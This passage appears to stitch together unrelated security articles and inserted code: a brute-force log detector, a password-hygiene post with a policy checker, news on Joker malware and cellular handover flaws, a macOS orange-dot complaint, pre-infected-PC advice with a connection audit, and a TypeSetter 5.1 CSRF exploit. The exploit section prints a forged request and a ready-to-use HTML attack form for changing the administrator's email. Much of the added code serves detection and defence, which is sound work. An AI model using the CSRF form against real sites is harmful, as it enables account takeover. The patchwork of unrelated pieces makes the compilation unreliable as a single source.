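    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def build_sample_log():
    """Constructed sample: 203.0.113.7 replays the script's two loops
    (reset-password probing, then login guesses); 198.51.100.4 is a normal user."""
    lines = []
    for i in range(6):                       # username enumeration phase
        ts = f"01/Dec/2021:10:00:{i:02d} +0000"
        lines.append(f'203.0.113.7 - - [{ts}] "POST /index.php HTTP/1.1" 302 0 "-" "python-requests/2.25"')
        lines.append(f'203.0.113.7 - - [{ts}] "GET /users/reset_password HTTP/1.1" 200 900 "-" "python-requests/2.25"')
    for i in range(12):                      # password guessing phase, five minutes later
        ts = f"01/Dec/2021:10:05:{i:02d} +0000"
        lines.append(f'203.0.113.7 - - [{ts}] "POST /index.php HTTP/1.1" 302 0 "http://cms.example/login/showlogin" "Mozilla/5.0"')
        lines.append(f'203.0.113.7 - - [{ts}] "GET /login/showlogin HTTP/1.1" 200 512 "-" "Mozilla/5.0"')
    lines.append('198.51.100.4 - - [01/Dec/2021:10:05:05 +0000] "POST /index.php HTTP/1.1" 302 0 "http://cms.example/login/showlogin" "Mozilla/5.0"')
    return lines


def parse_line(line):
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def burst_sources(lines, method, path, window_seconds, threshold):
    """Per-client sliding-window counter. Returns {ip: peak count} for clients whose
    number of `method path` requests inside any `window_seconds` span reaches `threshold`.
    Lines are assumed to be in time order, as a log file normally is."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != method or rec["path"] != path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            alerts[rec["ip"]] = max(alerts.get(rec["ip"], 0), len(q))
    return alerts


def detect_login_bruteforce(lines, window_seconds=60, threshold=10):
    # Logins POST to /index.php; form fields are not in the access log, so the
    # path is the best key available and the threshold must allow normal form traffic.
    return burst_sources(lines, "POST", "/index.php", window_seconds, threshold)


def detect_reset_probing(lines, window_seconds=60, threshold=5):
    # The script reads /users/reset_password after every guess to look for "administrator".
    return burst_sources(lines, "GET", "/users/reset_password", window_seconds, threshold)


if __name__ == "__main__":
    sample = build_sample_log()
    print("login brute-force:", detect_login_bruteforce(sample))
    print("reset-password probing:", detect_reset_probing(sample))
```

The detector only makes the attack visible; the fixes belong in the application: the reset-password flow should respond identically whether or not the name exists, and the login endpoint needs per-account and per-client rate limiting so that a wordlist cannot be walked at line speed.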

A recipe for failure: Predictably poor passwords


Security professionals advise to never use ‘beef stew’ as a password. It just isn’t stroganoff.
Passwords are the bane of everyone’s lives, but let’s face it – we all need them. And they aren’t going away as fast as Microsoft may want them to; we will continue to depend on them for the foreseeable future. You may have 50, 100, or even 200 online accounts, but how many passwords do you have? Are they all unique? Here is one anecdote suggesting that people still use the same few personalized passwords for all of their accounts.
I recently went to a conference hosted by a wealth management firm where they had invited me to present on cybersecurity. There were over 50 people in attendance and when I mentioned passwords, they did what so many people do when I mention the subject – they started looking around the room avoiding eye contact hoping not to be picked on. I quickly realized their body language was telling me they had poor password hygiene, so I decided to dig a little deeper and I asked them questions about their password management with some interesting responses.
I first asked if anyone used a password manager. One member of the audience put his hand up and said it was only because he had heard one of my talks in the past (I felt so humbled!). So, 98% of the people in the room did not use a password manager or have a system in place to take care of their accounts. I then asked them how they managed their online accounts and some owned up to using the same three or four passwords and many said these passwords included personal information such as special dates or names that meant something to them (wow, yes this was a facepalm moment where I really really tried to remain calm).


I decided to conduct a little experiment on the fly with one of the delegates. I have always found real-life experiments to work wonders when ‘in the moment’ because if they work, it gets the audience members doing their homework before they go to bed that night.
With his permission, this particular gentleman allowed me to proceed, and I quickly found him on Facebook. I located all his public content and made a list on the whiteboard of the possible passwords that I imagined he could be using. I jotted down places of interest, pets’ names, children’s names, dates of interest, sports teams, books, music… all the classic possibilities. I had about 20 different words and numbers in a list. This was the shocking part where I felt like I had located buried treasure.
As he picked his jaw up off the floor, he not only said that I had found one of his passwords, but I found iterations of three of his four passwords he “uses for everything”. I later found out that the iterations were in fact missing a capital letter at the beginning and a number at the end (typical, hey?!). This number was always the same – the date of the month he was born. The crowd were perplexed that I had cracked his passwords. I was not. This is standard behavior and cybercriminals know it.
This raises the question of why anyone, especially someone with access to a huge amount of wealth, data and livelihoods, would still choose a password that is weak on so many levels.
What is the future of the password? Are we able to truly go where humans haven’t properly ventured yet and attempt a true passwordless society? Or do you think, like me, that passwords and passphrases still have a place in cyber-society and, when used well, are actually an asset? Unlike biometrics, there is no limit to how many you can have, plus you can store your passwords in a password manager and have it generate them for you. Furthermore, when combined with multi-factor authentication such as an authenticator app or security key, signing in to an account is seamless and extremely easy for even the most entry-level user. I’ve even got my parents, in their mid-70s, using password managers alongside phone-based authenticator apps for all their accounts that support it – and they can’t stop telling me how easy it is!
One breach is enough to give a hacker access to all your accounts if you recycle passwords, so you may want to keep your passwords in a safe place. Many people already use Apple’s Keychain password manager or just save them in their browser. However, if your laptop or computer is ever stolen and it is not full-disk encrypted, whoever has the machine can use those saved passwords without ever needing to see what they are. A third-party, cross-device password manager may therefore be the safer choice.
Another top tip for keeping your data away from prying eyes and data breaches is a feature on Apple devices that lets you hide your email address from other parties. ‘Sign In With Apple’ lets you anonymize your email address when logging into services that support the feature, and more recently iCloud users have gained a feature called ‘Hide My Email’. This does exactly what it says: it lets you generate a single-use address that forwards incoming emails to your real account. If the data is ever compromised, your real email address stays safe.
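The pattern found on the whiteboard above (a known word with a capital letter at the front and a personal date at the end) is exactly what a password-set endpoint can refuse. This is an added example for this page, not code from the post's author: a policy check that undoes the habitual mutations and compares what is left against words and dates the system already knows about the user. The leet table, the common-word set, the token list and the minimum length are assumptions.

```python
import re

# Common "leet" substitutions, reversed (assumption: this short table covers the
# mutations people apply by habit).
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"})
# The number or symbol tacked on the end of a familiar word.
TRAILING_JUNK = re.compile(r"[\d!@#$%^&*.\-_]+$")
# A tiny stand-in for a real breached-password list.
COMMON = {"password", "welcome", "qwerty", "letmein"}


def normalize(candidate):
    """Undo the habitual mutations: drop the suffix, reverse leet, ignore the capital."""
    core = TRAILING_JUNK.sub("", candidate)
    return core.translate(LEET).lower()


def is_predictable(candidate, personal_tokens, min_len=12):
    """Policy check for a password-set endpoint.

    personal_tokens: strings the system already holds about the user (names, pets,
    teams, and dates as digit strings). Returns (rejected, reason)."""
    if len(candidate) < min_len:
        return True, f"shorter than {min_len} characters"
    core = normalize(candidate)
    if core in COMMON:
        return True, f"is the common word '{core}' in disguise"
    words = [t.lower() for t in personal_tokens if t and not t.isdigit()]
    dates = {t for t in personal_tokens if t.isdigit()}
    for word in words:
        if core == word:
            return True, f"is '{word}' with a capital and a number bolted on"
        if len(word) >= 4 and word in core:
            return True, f"contains the personal word '{word}'"
    # Every digit run in the candidate is compared against the known dates.
    for digits in re.findall(r"\d+", candidate):
        if digits in dates:
            return True, f"uses the personal date fragment '{digits}'"
    return False, "accepted"


# Constructed profile, the kind of list the speaker built from a public Facebook page.
PROFILE = ["Fluffy", "Arsenal", "Emily", "12"]

if __name__ == "__main__":
    for pw in ["Fluffy2012!!", "Ar5enal-1990", "Emily-Rose-2010", "Sunshine12",
               "P@ssw0rd2021!", "correct horse battery staple"]:
        print(f"{pw!r:32} -> {is_predictable(pw, PROFILE, min_len=8)}")
```

The check is deliberately lenient about what counts as a "personal" token: anything the service already stores about the user, plus a breach list, is enough to catch the three-of-four-passwords case from the talk without ever seeing the user's other accounts.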


500,000+ Android Users Downloaded a New Joker Malware App from Play Store


A malicious Android app with more than 500,000 downloads from the Google Play app store has been found hosting malware that stealthily exfiltrates users’ contact lists to an attacker-controlled server and signs up users to unwanted paid premium subscriptions without their knowledge.

The latest Joker malware was found in a messaging-focused app named Color Message (“com.guo.smscolor.amessage”), which has since been removed from the official app marketplace. In addition, it has been observed simulating clicks in order to generate revenue from malicious ads and connecting to servers located in Russia.

Color Message “accesses users’ contact list and exfiltrates it over the network [and] automatically subscribes to unwanted paid services,” mobile security firm Pradeo noted. “To make it difficult to be removed, the application has the capability to hide its icon once installed.”

“We is [sic] committed to ensuring that the app is as useful and efficient as possible,” the developers behind Color Message state in their terms and conditions. “For that reason, we reserve the right to make changes to the app or to charge for its services, at any time and for any reason. We will never charge you for the app or its services without making it very clear to you exactly what you’re paying for.”

Joker, since its discovery in 2017, has been a notorious fleeceware infamous for carrying out an array of malicious activities, including billing fraud and intercepting SMS messages, contact details, and device information unbeknownst to users.


The rogue apps have continued to skirt Google Play protections using a barrage of evasion tactics to the point that Android’s Security and Privacy Team said the malware authors “have at some point used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected.”


Global Mobile Network Vulnerabilities Affect All Cellular Generations Since 2G


Global mobile network vulnerabilities are said to affect all cellular generations since 2G.

Researchers have disclosed security vulnerabilities in handover, a fundamental mechanism that undergirds modern cellular networks, which could be exploited by adversaries to launch denial-of-service (DoS) and man-in-the-middle (MitM) attacks using low-cost equipment.

The “vulnerabilities in the handover procedure are not limited to one handover case only but they impact all different handover cases and scenarios that are based on unverified measurement reports and signal strength thresholds,” researchers Evangelos Bitsikas and Christina Pöpper from the New York University Abu Dhabi said in a new paper. “The problem affects all generations since 2G (GSM), remaining unsolved so far.”

Handover, also known as handoff, is a process in telecommunications in which a phone call or a data session is transferred from one cell site (aka base station) to another cell tower without losing connectivity during the transmission. This method is crucial to establishing cellular communications, especially in scenarios when the user is on the move.

The routine typically works as follows: the user equipment (UE) sends signal strength measurements to the network to determine if a handover is necessary and, if so, facilitates the switch when a more suitable target station is discovered.

While these signal readings are cryptographically protected, the contents of the reports themselves are not verified, which allows an attacker to force the device to move to a cell site operated by the attacker. The crux of the attack lies in the fact that the source base station cannot detect incorrect values in the measurement report, opening the door to a malicious handover that goes unnoticed.

The new fake base station attacks, in a nutshell, render vulnerable the handover procedures, which are based on the aforementioned encrypted measurement reports and signal power thresholds, effectively enabling the adversary to establish a MitM relay and even eavesdrop, drop, modify, and forward messages transmitted between the device and the network.

“If an attacker manipulates the content of the [measurement report] by including his/her measurements, then the network will process the bogus measurements,” the researchers said. “This is possible by imitating a legitimate base station and replaying its broadcast messages.”

“Attracting” the device to a fake base station

The starting point of the attack is an initial reconnaissance phase wherein the threat actor utilizes a smartphone to collect data pertaining to nearby legitimate stations and then uses this information to configure a rogue base station that impersonates a genuine cell station.

The attack subsequently involves forcing a victim’s device to connect to the false station by broadcasting master information block (MIB) and system information block (SIB) messages — information necessary to help the phone connect to the network — with a higher signal strength than the emulated base station.

In tricking the UEs to connect to the imposter station and forcing the devices to report bogus measurements to the network, the goal is to trigger a handover event and exploit security flaws in the process to result in DoS, MitM attacks, and information disclosure affecting the user as well as the operator. This not only compromises users’ privacy but also puts service availability at risk.

“When the UE is in the coverage area of the attacker, the rogue base station has high enough signal power to ‘attract’ the UE and trigger a [measurement report], then the attacker has very good chances of forcing the victim UE to attach to his/her rogue base station [by] abusing the handover procedure,” the researchers explained.

“Once, the UE is attached to the attacker it could either enter in a camped mode due to a denial-of-service (DoS) attack and become unresponsive, or the attacker could establish a man-in-the-middle (MitM) relay building the basis for other advanced exploits.”

As many as six security vulnerabilities (identified from A to F in the image above) have been identified in the handover process —

  • Insecure broadcast messages (MIB, SIB)
  • Unverified measurement reports
  • Missing cross-validation in the preparation phase
  • Random-access channel (RACH) initiation without verification
  • Missing recovery mechanism, and
  • Difficulty of distinguishing network failures from attacks

In an experimental setup, the researchers found all the test devices, including OnePlus 6, Apple iPhone 5, Samsung S10 5G, and Huawei Pro P40 5G, to be susceptible to DoS and MitM attacks. The findings were presented at the Annual Computer Security Applications Conference (ACSAC) held earlier this month.
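To make the flaw concrete, here is an added toy model, written for this page and not the 3GPP procedure nor the fix proposed by Bitsikas and Pöpper: the handover decision as a pure function of the UE's report, beside a version that cross-validates the claimed target against information the network holds independently of the UE. The cell identities, power values, hysteresis, tolerance and the "uplink power" table are all constructed for the model.

```python
from dataclasses import dataclass, field

HYSTERESIS_DB = 3.0     # target must beat the serving cell by this margin (assumed value)


@dataclass
class MeasurementReport:
    """What the UE sends: integrity-protected in transit, but the numbers are whatever
    the UE measured, including what a rogue cell made it measure."""
    ue_id: str
    serving_pci: int       # physical cell identity of the serving cell
    serving_rsrp: float    # dBm
    target_pci: int
    target_rsrp: float


@dataclass
class NetworkView:
    """Information the network holds on its own (constructed for this model): the serving
    cell's configured neighbour list and the power each real neighbour measures from the
    UE on the uplink."""
    neighbours: set
    uplink_power: dict = field(default_factory=dict)   # {(pci, ue_id): dBm}


def decide_unverified(report):
    """The logic the article describes: the decision depends only on the report."""
    return report.target_rsrp > report.serving_rsrp + HYSTERESIS_DB


def decide_cross_validated(report, view, tolerance_db=10.0):
    """Illustrative hardening: before preparing the handover, check the claimed target
    against what the network itself observes. Returns (handover, reason)."""
    if not decide_unverified(report):
        return False, "no handover: target not stronger than serving + hysteresis"
    if report.target_pci not in view.neighbours:
        return False, "rejected: claimed target is not a configured neighbour"
    heard = view.uplink_power.get((report.target_pci, report.ue_id))
    if heard is None:
        return False, "rejected: the real target cell does not hear this UE"
    if abs(heard - report.target_rsrp) > tolerance_db:
        return False, f"rejected: report {report.target_rsrp} dBm vs uplink {heard} dBm is implausible"
    return True, "handover prepared"


# Constructed scenario: genuine neighbour PCI 7 hears the UE at -88 dBm.
VIEW = NetworkView(neighbours={7, 9}, uplink_power={(7, "ue1"): -88.0})
GENUINE = MeasurementReport("ue1", 5, -95.0, 7, -85.0)
# A rogue cell replaying PCI 7's broadcasts at high power makes the UE report -60 dBm for "7".
SPOOFED = MeasurementReport("ue1", 5, -95.0, 7, -60.0)
# A rogue cell announcing an identity the serving cell has no neighbour relation with.
UNKNOWN = MeasurementReport("ue1", 5, -95.0, 42, -60.0)

if __name__ == "__main__":
    for name, rep in [("genuine", GENUINE), ("spoofed", SPOOFED), ("unknown", UNKNOWN)]:
        print(name, decide_unverified(rep), decide_cross_validated(rep, VIEW))
```

The point of the model is the asymmetry: the unverified decision says "handover" for all three reports, because it has nothing but the UE's numbers to go on, while any second source of truth on the network side turns the spoofed report into an anomaly that can be logged as well as refused.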


Apple added an orange dot that’s a showstopper for live visuals



In the interest of security and privacy, Apple on macOS Monterey has added a prominent orange dot to display outputs when audio capture is active. That renders their machines unusable for live visual performance, though, since it’s also shown on external displays. Dear macOS team – we urgently need a fix here.
The basic idea here is sound – to avoid software hijacking your camera and audio input and spying on you, essentially, there’s an orange dot to let you know recording is active. But this essentially makes the Mac unusable for live visuals, since it impacts external projectors and LED walls and the like. (Those applications don’t even need to be obviously using audio; live visuals often use mic or line input to produce sound-reactive animation and the like.)
Mark Coniglio, lead developer of Isadora and a Mac AV veteran for decades, writes a clear explanation that I, uh, hope is getting passed to someone on the OS team soon. (Picture from his post.)
In their infinite wisdom, Apple has added a security feature that negatively affects every audio/video app that uses one of the displays to output to a video projector, including our beloved Isadora. In MacOS Monterey, if any macOS app starts capturing audio an “orange dot” appears to warn you on the primary display and on all secondary displays. In our particular case, this means that this orange dot appears on the stage output, which is totally unacceptable for anyone using macOS as a professional video tool that sends video output to a video projector.
A more detailed description, plus a call to action to all artists to provide feedback through Apple’s form, is available on the TroikaTronix site:
[TroikaTronix Community]
You can disable the menu bar on external displays, via the “Displays Have Separate Spaces” display preference, but the orange dot still appears.

I just tested this using Ableton Live 11.1 Beta, for instance, and the orange dot is there. I had missed it as I suspect many people had, as you wouldn’t notice there was an issue until you tried to use full-screen output on a display – which you will do when you have a show, but not necessarily when you’re developing content.
More information:
QLab user discussion (that’s the popular Mac live show software)
I’ve also contacted Apple directly to ask if there’s a workaround we’re missing and to ensure this feedback reaches engineering. Meanwhile, this kind of feedback is logged, so provide a rational explanation and your use case as suggested above if this impacts you – which if you read this site is pretty likely.
Unfortunately, these kinds of clashes are not uncommon as the intensive and specific needs of artists and pro audiovisual needs meet up with our mortal enemies, security and battery life. But past experience suggests they are solvable problems. And while these users represent a fringe, they also are some of the bigger spenders on Apple hardware and show off the Mac’s most powerful creative potential, as I noted in my recent MacBook Pro review.
And it does seem there could be a fix here; you already have to give applications permission to access your mic and camera, and it seems there should be some way for an app to disable the orange dot once its permissions are elevated with opt-in by the user.
Here’s hoping they find that solution. Until then, yeah, this is a strike against the Mac just as it was finally becoming competitive again with PCs for live visuals. Watch this space.
Photo courtesy Apple.


Is Your Brand New Computer Pre-Infected With Malware?


Over the years there have been reports of more and more new computers being pre-infected with malware before they even reach the end user. This issue highlights the current lack of adequate supply chain security in portions of the computer industry. While the malware infections detailed in most reports seem to originate from component manufacturers overseas, there is no reason to think that this type of thing can’t happen domestically as well. We have seen evidence of devices shipped from China loaded with malware.

Why would someone want to pre-infect a computer?

It’s really all about the money. Unscrupulous criminals participate in malware affiliate marketing programs where they are paid to infect as many computers as possible.

Some of these illegal affiliate programs pay participants as much as $250 for every 1000 computers that they can infect. Infecting a computer or component at the factory-level allows these criminals to achieve a huge number of infected computers in a short amount of time with limited effort since they don’t have to bypass traditional security safeguards.

New York Times: Microsoft Finds PCs That Ship Pre-Infected

In 2012, The New York Times reported that Microsoft had found some computers are shipping with viruses installed that could affect the security and privacy of the data you save on those machines:

On Thursday, Microsoft said it had discovered several new computers, fresh from Chinese factory floors, that carried a particularly pernicious computer virus, one capable of invading bank accounts, starting computer attacks and creating back doors that allow criminals to have their way with infected machines.

Microsoft digital crime researchers purchased 20 new computers from different cities in China and discovered that four of them had been infected with viruses. […]

That virus, called Nitol, reported back to a command and control center hosted by the Web domain 3322.org, which is registered to Bei Te Kang Mu Software Technology. That domain, Microsoft researchers say, hosts 500 different strains of malware. Some are capable of switching on a victim’s microphone or Web camera. Others record victims’ keystrokes, giving cybercriminals access to their log-in credentials and online bank accounts.

Microsoft got permission from a United States court to take down the network of Nitol-infected computers. The takedown was part of a civil suit brought by Microsoft in its increasingly aggressive campaign, called Project MARS (Microsoft Active Response for Security), to take the lead in combating digital crime rather than waiting for law enforcement to act.


When You First Boot up Your New Computer, Don’t Connect It to a Network

Most modern malware will want to connect to a network so that it can communicate with its command-and-control (C2) server, especially if it is part of a botnet. It may also use the network to download additional malware or updates, or to send passwords and other personal information it has gathered from you. Isolate your new computer until you can properly scan it to make sure it is not pre-infected.

Use Another Computer to Download a Second Opinion Scanner and Install It

From another computer, download a scanner such as Malwarebytes or another malware-specific scanner and save it to a CD/DVD or a USB drive so you can install it on the new computer without using a network connection. The antivirus software on the new computer may already have been compromised or altered so that it is blind to the malware infection; it may report that there is no infection even though malware is present. That is why you need a second-opinion scanner to make sure there is no preloaded malware on your computer.

If possible, try and find a malware scanner that can scan your system prior to the startup of the operating system as some malware can hide on areas of the disk that can’t be accessed by the operating system. Additionally, all partitions of a device must be fully scanned or analysed manually using a suitable OS or similar.

If you find an out-of-the-box malware infection, you should return the system to the seller and have them alert the manufacturer of the computer that was infected so that they can investigate the issue.

If you still suspect that your new computer might be pre-infected with malware, consider removing the hard drive, placing it in an external USB drive enclosure, and connecting it to another computer that has current anti-virus and anti-malware software. As soon as you connect the drive from the new computer to the USB port of a host computer, scan the USB drive for viruses and other malware. Do not open any files on the USB hard drive while it is connected to the host computer; doing so could infect the host.

Once you have scanned the drive for viruses using a traditional virus scanner and used an anti-malware scanner, consider using a second-opinion malware scanner as well to ensure that no stone is left unturned. Even with all these scans, it’s possible that the computer’s firmware may be infected, but this is probably much less likely than having a more traditional malware infection that can be detected by malware scanners.

If all scans are ‘green’, move your hard drive back to the new computer and ensure that you maintain your anti-virus and anti-malware updates and run regularly scheduled scans of your system.
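The isolation advice above assumes you can tell legitimate first-boot traffic (update checks) from a beacon. As an added example, not from this article, the following audit reads a constructed connection log captured during a first boot on an isolated segment (a firewall in log-only mode, or a host-side connection log) and flags destinations that are not on a vendor allowlist, connections to bare IP addresses, and unusual ports. The CSV format, the allowlist suffixes, the process names and the addresses (IETF documentation ranges) are all assumptions.

```python
import csv
import io
import ipaddress

# Update hosts a freshly unboxed machine may legitimately reach
# (assumed suffixes for this example; a real list comes from the vendor).
ALLOWED_SUFFIXES = ("vendor.example", "os-updates.example")
EXPECTED_PORTS = {80, 443}

# Constructed first-boot capture. 192.0.2.x and 203.0.113.x are documentation ranges.
SAMPLE_CONNECTIONS = """\
ts,process,dest_host,dest_ip,dest_port
2021-12-01T09:00:01,svchost.exe,update.vendor.example,192.0.2.10,443
2021-12-01T09:00:02,svchost.exe,ctl.os-updates.example,192.0.2.11,80
2021-12-01T09:00:05,oem_helper.exe,-,203.0.113.55,8080
2021-12-01T09:00:07,oem_helper.exe,cdn.unknown-party.example,203.0.113.56,443
2021-12-01T09:00:09,svchost.exe,update.vendor.example,192.0.2.10,443
"""


def host_allowed(host, allowed):
    """True when the host is one of the allowed suffixes or a subdomain of one."""
    return any(host == s or host.endswith("." + s) for s in allowed)


def audit_first_boot(csv_text, allowed=ALLOWED_SUFFIXES, expected_ports=EXPECTED_PORTS):
    """Return one finding per suspicious connection: (process, destination, port, reasons)."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = []
        host = row["dest_host"].strip()
        port = int(row["dest_port"])
        ipaddress.ip_address(row["dest_ip"])          # rejects malformed address fields early
        no_name = host in ("", "-")
        if no_name:
            reasons.append("bare IP, no hostname")   # typical of a hard-coded C2 address
        elif not host_allowed(host, allowed):
            reasons.append("destination not on the vendor allowlist")
        if port not in expected_ports:
            reasons.append(f"unusual port {port}")
        if reasons:
            findings.append((row["process"], row["dest_ip"] if no_name else host, port, reasons))
    return findings


def processes_to_investigate(findings):
    """The binaries that need a closer look (hash them, check signatures) before the machine goes online."""
    return sorted({f[0] for f in findings})


if __name__ == "__main__":
    found = audit_first_boot(SAMPLE_CONNECTIONS)
    for process, dest, port, reasons in found:
        print(f"{process:16} {dest}:{port}  {'; '.join(reasons)}")
    print("investigate:", processes_to_investigate(found))
```

An allowlist built from the vendor's documentation is the weak point of this audit: keep it short and treat anything outside it as a question to answer, not an automatic verdict, since a legitimate OEM helper and a factory-installed beacon look alike until you inspect the binary.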


TypeSetter 5.1 – CSRF (Change admin e-mail) Exploit


Date: 2020-12-01

CVE: N/A

Platform: PHP

# Exploit Title: TypeSetter 5.1 - CSRF (Change admin e-mail)
# Exploit Author: Alperen Ergel
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Kali & ubuntu
# Category: WebApp

######## Description ########

An attacker can change the admin e-mail address by having a logged-in administrator's browser submit a forged preferences request.

## Vulnerable

- Go to the admin page view preferences
- Change the e-mail address

######## Proof of Concept ########

===> REQUEST <==== 
POST /typesetter/Admin/Preferences HTTP/1.1
Host: http://localhost/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 237
Origin: http://localhost/
Connection: close
Referer: http://localhost/typesetter/Admin/Preferences

## < SNIPP > 


verified=6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c
&email=demo%40mail.com&oldpassword=&password=&password1=&algo=password_hash&cmd=changeprefs&aaa=Save

#### Attack Code ####

```
<html>
  <body>
    <form action="http://localhost/typesetter/Admin/Preferences" method="POST">
      <input type="hidden" name="verified" value="6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c" />
      <input type="hidden" name="email" value="[CHANGE HERE]" />
      <input type="hidden" name="oldpassword" value="" />
      <input type="hidden" name="password" value="" />
      <input type="hidden" name="password1" value="" />
      <input type="hidden" name="algo" value="password&#95;hash" />
      <input type="hidden" name="cmd" value="changeprefs" />
      <input type="hidden" name="aaa" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
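For comparison with the request above, here is an added example (not TypeSetter's code) of what the server side of a resistant preferences handler checks: a per-session secret token compared in constant time, plus an Origin/Referer check. The form field name `csrf`, the `Session` class, the allowed origin and the scenario functions are assumptions made for this example.

```python
import hmac
import secrets

# The site's own origin, taken from the PoC's Origin header (assumption: nothing
# else may post to the preferences handler).
ALLOWED_ORIGIN = "http://localhost"


class Session:
    """Server-side session: the anti-CSRF secret lives here, bound to one login."""
    def __init__(self):
        self.csrf_token = secrets.token_hex(32)
        self.email = None


def render_preferences_form(session):
    """The form embeds this session's token; a page on another origin cannot read it."""
    return (f'<form action="/typesetter/Admin/Preferences" method="POST">'
            f'<input type="hidden" name="csrf" value="{session.csrf_token}">'
            f'<input type="email" name="email"></form>')


def same_origin(headers):
    """Origin (or Referer as a fallback) must be the site itself."""
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return False
    return origin == ALLOWED_ORIGIN or origin.startswith(ALLOWED_ORIGIN + "/")


def handle_change_prefs(session, form, headers):
    """Handler for cmd=changeprefs. Returns (accepted, reason)."""
    if not same_origin(headers):
        return False, "rejected: cross-origin request"
    submitted = form.get("csrf", "")
    # Constant-time comparison against the token bound to *this* session, so a value
    # copied from another session or an older page load does not validate.
    if not hmac.compare_digest(session.csrf_token.encode(), submitted.encode()):
        return False, "rejected: CSRF token missing or not this session's"
    if form.get("cmd") != "changeprefs":
        return False, "rejected: unknown command"
    session.email = form.get("email")
    return True, "preferences updated"


# Constructed scenario: one logged-in administrator.
VICTIM = Session()
LEGIT_HEADERS = {"Origin": "http://localhost",
                 "Referer": "http://localhost/typesetter/Admin/Preferences"}
CROSS_SITE_HEADERS = {"Origin": "http://attacker.example",
                      "Referer": "http://attacker.example/page.html"}


def legitimate_submission():
    form = {"csrf": VICTIM.csrf_token, "cmd": "changeprefs", "email": "admin@example.org"}
    return handle_change_prefs(VICTIM, form, LEGIT_HEADERS)


def forged_submission():
    """The PoC pattern against this handler: a fixed token captured from some other
    session, auto-submitted from a third-party page."""
    stale_token = Session().csrf_token
    form = {"csrf": stale_token, "cmd": "changeprefs", "email": "attacker@example.org"}
    return handle_change_prefs(VICTIM, form, CROSS_SITE_HEADERS)


def forged_same_origin_without_token():
    """Even with a spoofed or missing Origin check, the token alone blocks the change."""
    form = {"cmd": "changeprefs", "email": "attacker@example.org"}
    return handle_change_prefs(VICTIM, form, LEGIT_HEADERS)
```

The two checks are independent layers: the origin check stops the forged form in the browser-visible headers, the session-bound token stops any request that did not originate from a page the server itself rendered for this login. A `SameSite=Lax` or `Strict` attribute on the session cookie is a third, browser-enforced layer that keeps the cookie off cross-site POSTs entirely.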